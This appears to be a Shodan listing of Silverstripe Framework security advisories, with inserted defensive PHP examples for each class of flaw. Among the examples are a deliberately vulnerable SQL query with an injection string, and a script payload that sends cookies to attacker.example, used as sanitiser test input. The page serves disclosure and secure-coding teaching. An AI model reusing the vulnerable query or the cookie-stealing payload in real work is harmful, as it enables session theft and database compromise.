Vulnerabilities
Vulnerable Software
Silverstripe Framework is the framework that forms the base of the Silverstripe content management system. Prior to versions 4.13.39 and 5.1.11, if a user is not permitted to view a record, but that record can be added to a `GridField` through the `GridFieldAddExistingAutocompleter` component, the record's title can still be read by that user. Versions 4.13.39 and 5.1.11 contain a fix for this issue.
CVSS Score
4.3
EPSS Score
0.002
Published
2024-01-23
Silverstripe Framework is the Model-View-Controller framework that powers the Silverstripe content management system. Prior to version 4.12.15, an attacker can display a link to a third party website on a login screen by convincing a legitimate content author to follow a specially crafted link. Users should upgrade to Silverstripe Framework 4.12.15 or above to address the issue.
CVSS Score
5.4
EPSS Score
0.002
Published
2023-04-26
Silverstripe Framework is the Model-View-Controller framework that powers the Silverstripe content management system. Prior to version 4.12.15, the GridField print view incorrectly validates the permission of DataObjects potentially allowing a content author to view records they are not authorised to access. Users should upgrade to Silverstripe Framework 4.12.15 or above to address the issue.
CVSS Score
4.3
EPSS Score
0.003
Published
2023-04-26
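Both GridField advisories above (the autocompleter title leak and the print view permission check) come down to a GridField component reading records without consulting the model's `canView()`. The following is an added illustration, not the upstream fix or project code: it keeps the autocompleter's search list and the grid's row list on the same permission-filtered query so that neither the search results nor the print/export output can include a record the member may not open. The `Contract` model, its `IsConfidential` visibility rule and the `viewableBy()` helper are assumptions for the example; `setSearchList()`, `getComponentByType()` and `canView()` are real framework APIs.

```php
<?php
// Added illustration (not the upstream fix): keep a GridField's search
// list, row list and print/export output consistent with canView(), so a
// member never sees the title of a record they may not open.
use SilverStripe\Forms\GridField\GridField;
use SilverStripe\Forms\GridField\GridFieldAddExistingAutocompleter;
use SilverStripe\Forms\GridField\GridFieldConfig_RelationEditor;
use SilverStripe\ORM\DataList;
use SilverStripe\ORM\DataObject;
use SilverStripe\Security\Member;
use SilverStripe\Security\Permission;
use SilverStripe\Security\Security;

// Hypothetical model for the example; the visibility rule is an assumption.
class Contract extends DataObject
{
    private static $table_name = 'Contract';
    private static $db = [
        'Title'          => 'Varchar(255)',
        'IsConfidential' => 'Boolean',
    ];

    public function canView($member = null)
    {
        $member = $member ?: Security::getCurrentUser();
        if (!$member) {
            return false;
        }
        return !$this->IsConfidential || Permission::check('ADMIN', 'any', $member);
    }

    /**
     * The same rule as canView(), expressed as a DataList filter so it can be
     * applied at query time (the autocompleter needs a DataList, not a
     * per-record callback). If canView() changes, this must change with it.
     */
    public static function viewableBy(?Member $member, ?DataList $list = null): DataList
    {
        $list = $list ?: static::get();
        if (!$member) {
            return $list->filter('ID', 0); // nothing for anonymous users
        }
        if (Permission::check('ADMIN', 'any', $member)) {
            return $list;
        }
        return $list->filter('IsConfidential', false);
    }
}

/**
 * $relation is e.g. a has_many / many_many list of Contract (a DataList).
 */
function buildContractGridField(DataList $relation): GridField
{
    $member = Security::getCurrentUser();
    $config = GridFieldConfig_RelationEditor::create();

    /** @var GridFieldAddExistingAutocompleter $auto */
    $auto = $config->getComponentByType(GridFieldAddExistingAutocompleter::class);
    // Autocomplete only searches records this member may view, so its
    // search results cannot reveal titles of confidential records.
    $auto->setSearchList(Contract::viewableBy($member));

    // Rows, and anything the print/export components read from the grid's
    // list, come from the same permission-filtered query.
    return GridField::create(
        'Contracts',
        'Contracts',
        Contract::viewableBy($member, $relation),
        $config
    );
}
```

The check a practitioner should add alongside this is a unit test that, for a non-admin member, asserts `Contract::viewableBy($member)->count()` equals the number of records for which `canView($member)` is true; the two rules drifting apart is exactly how this class of leak reappears.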
Silverstripe silverstripe/framework through 4.11 is vulnerable to XSS via a carefully crafted return URL on a /dev/build or /Security/login request.
CVSS Score
6.1
EPSS Score
0.005
Published
2022-11-22
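The return-URL XSS above and the earlier login-screen link advisory both involve a URL supplied by the request being trusted and rendered. The following is an added illustration of defensive return-URL handling (Silverstripe names the parameter `BackURL`); it is not the upstream patch and does not claim to reproduce either advisory's exact vector. `Director::is_site_url()`, `Convert::raw2att()`, `Convert::raw2xml()`, `requestVar()` and `redirect()` are real framework APIs; `safeBackUrl()`, `redirectBackSafely()` and `backLinkHtml()` are assumed helper names.

```php
<?php
// Added illustration of safe return-URL (BackURL) handling; not the
// upstream patch for the advisories above.
use SilverStripe\Control\Controller;
use SilverStripe\Control\Director;
use SilverStripe\Control\HTTPRequest;
use SilverStripe\Control\HTTPResponse;
use SilverStripe\Core\Convert;

/**
 * Return $candidate only if it is a relative or same-site http(s) URL;
 * otherwise return $fallback. Rejects other hosts, protocol-relative
 * forms ("//evil.example/") and pseudo-schemes such as javascript:.
 */
function safeBackUrl(?string $candidate, string $fallback = '/'): string
{
    if ($candidate === null || trim($candidate) === '') {
        return $fallback;
    }
    $scheme = parse_url($candidate, PHP_URL_SCHEME);
    if ($scheme === false) {
        return $fallback; // unparseable
    }
    if ($scheme !== null && !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return $fallback; // javascript:, data:, vbscript:, ...
    }
    // Director::is_site_url() is false for absolute or protocol-relative
    // URLs whose host is not this site's host.
    if (!Director::is_site_url($candidate)) {
        return $fallback;
    }
    return $candidate;
}

/**
 * Controller-side use: validate before redirecting.
 */
function redirectBackSafely(Controller $controller, HTTPRequest $request): HTTPResponse
{
    $back = safeBackUrl($request->requestVar('BackURL'), Director::absoluteBaseURL());
    return $controller->redirect($back);
}

/**
 * Template-side use: if the URL must be rendered into markup (a "continue"
 * link on a login or /dev/build page), escape it as an attribute value so
 * quotes and angle brackets cannot break out of href="...", and as text
 * where it appears between tags.
 */
function backLinkHtml(string $backUrl): string
{
    $url = safeBackUrl($backUrl);
    return '<a href="' . Convert::raw2att($url) . '">' . Convert::raw2xml($url) . '</a>';
}
```

In `.ss` templates the equivalent of `Convert::raw2att()` is the `.ATT` cast (`href="$BackURL.ATT"`); a variable rendered with `.RAW`, or a PHP-side string concatenated into markup without escaping, is the pattern to look for when auditing for this class of bug.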
Silverstripe silverstripe/framework through 4.11 allows XSS (issue 2 of 3).
CVSS Score
5.4
EPSS Score
0.003
Published
2022-11-21
Silverstripe silverstripe/framework through 4.11 allows SQL Injection.
CVSS Score
8.8
EPSS Score
0.002
Published
2022-11-21
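The advisory above gives no detail of the injection point, so the following is an added illustration of the vulnerability class in Silverstripe's ORM, not a reconstruction of the specific bug: request input interpolated into a raw `where()` fragment, beside the three parameterised forms the framework provides. The `Article` model and the function names are assumptions for the example; `DataList::filter()`, the `['... = ?' => $value]` form of `where()`, `DB::prepared_query()` and `Query::value()` are real framework APIs.

```php
<?php
// Added illustration of the injection class, not the specific advisory:
// raw SQL built from request input beside the parameterised forms.
use SilverStripe\ORM\DataList;
use SilverStripe\ORM\DataObject;
use SilverStripe\ORM\DB;

// Hypothetical model for the example.
class Article extends DataObject
{
    private static $table_name = 'Article';
    private static $db = [
        'Title'  => 'Varchar(255)',
        'Status' => 'Varchar(32)',
    ];
}

// VULNERABLE: request input interpolated into a raw WHERE fragment.
// $status = "x' OR 1=1 --" returns every row; a UNION or stacked statement
// (where the driver allows it) does worse.
function articlesByStatusVulnerable(string $status): DataList
{
    return Article::get()->where("\"Article\".\"Status\" = '$status'");
}

// SAFE (1): ORM filter; the value is bound as a query parameter.
function articlesByStatus(string $status): DataList
{
    return Article::get()->filter('Status', $status);
}

// SAFE (2): raw SQL is sometimes unavoidable; keep the value in the
// parameter array rather than in the SQL string.
function articlesByStatusRaw(string $status): DataList
{
    return Article::get()->where(['"Article"."Status" = ?' => $status]);
}

// SAFE (3): DB::prepared_query() for hand-written statements.
function countByStatus(string $status): int
{
    $result = DB::prepared_query(
        'SELECT COUNT(*) AS "C" FROM "Article" WHERE "Status" = ?',
        [$status]
    );
    return (int) $result->value();
}
```

When reviewing a project for this class of bug, grep for `->where("` and `DB::query(` with a variable inside the string; `Convert::raw2sql()` escaping is a weaker last resort than binding and is easy to forget on one of several call sites.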
Silverstripe silverstripe/framework through 4.10.0 allows XSS inside of script tags that can be added to website content via XHR by an authenticated CMS user if the cwp-core module is not installed or the sanitise_server_side config is not set to true in project code.
CVSS Score
5.4
EPSS Score
0.003
Published
2022-06-28
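The advisory above names the mitigating setting, `sanitise_server_side`, so the following added example shows the weak default beside the hardened value and what the setting actually does: with it enabled, `HTMLEditorField` runs `HTMLEditorSanitiser` over submitted content on save, so markup posted straight over XHR (bypassing TinyMCE's client-side filtering) is cleaned against the active editor configuration. This is illustration, not the upstream patch; `Config::modify()->set()`, `HTMLEditorSanitiser`, `HTMLEditorConfig::get_active()` and `HTMLValue` are real framework APIs, while `sanitiseForStorage()` and the sample input are constructed for the example. The page notes that installing cwp-core has the same effect as setting the config.

```php
<?php
// Added illustration: turn on server-side sanitising of HTMLEditorField
// content, and apply the same sanitiser to an arbitrary fragment. Not the
// upstream patch.
use SilverStripe\Core\Config\Config;
use SilverStripe\Forms\HTMLEditor\HTMLEditorConfig;
use SilverStripe\Forms\HTMLEditor\HTMLEditorField;
use SilverStripe\Forms\HTMLEditor\HTMLEditorSanitiser;
use SilverStripe\View\Parsers\HTMLValue;

// Weak: the framework default in the affected range leaves this false, so
// whatever the CMS user's browser (or an XHR client) posts is saved as-is.
// Config::modify()->set(HTMLEditorField::class, 'sanitise_server_side', false);

// Hardened: HTMLEditorField::saveInto() runs HTMLEditorSanitiser against the
// active TinyMCE configuration (its valid_elements rules) before saving.
Config::modify()->set(HTMLEditorField::class, 'sanitise_server_side', true);

/**
 * Apply the same sanitiser to a fragment yourself, e.g. in a custom
 * endpoint that accepts HTML over XHR rather than through HTMLEditorField.
 */
function sanitiseForStorage(string $html): string
{
    $value = HTMLValue::create($html);
    $sanitiser = new HTMLEditorSanitiser(HTMLEditorConfig::get_active());
    $sanitiser->sanitise($value); // drops elements/attributes the config does not allow
    return $value->getContent();
}

// Constructed input for the example: a script element is not part of the
// allowed elements of the standard CMS editor config, so it is removed.
$untrusted = '<p>Hello</p><script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
$stored = sanitiseForStorage($untrusted);
```

In project code the setting is normally placed in YAML under `app/_config/` (`SilverStripe\Forms\HTMLEditor\HTMLEditorField:` with `sanitise_server_side: true`) rather than via `Config::modify()`, which is shown here only to keep the example in one language. Either way, run `dev/build?flush=1` afterwards and confirm that a `<script>` element posted through an `HTMLEditorField` no longer survives the save.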
Shodan ® - All rights reserved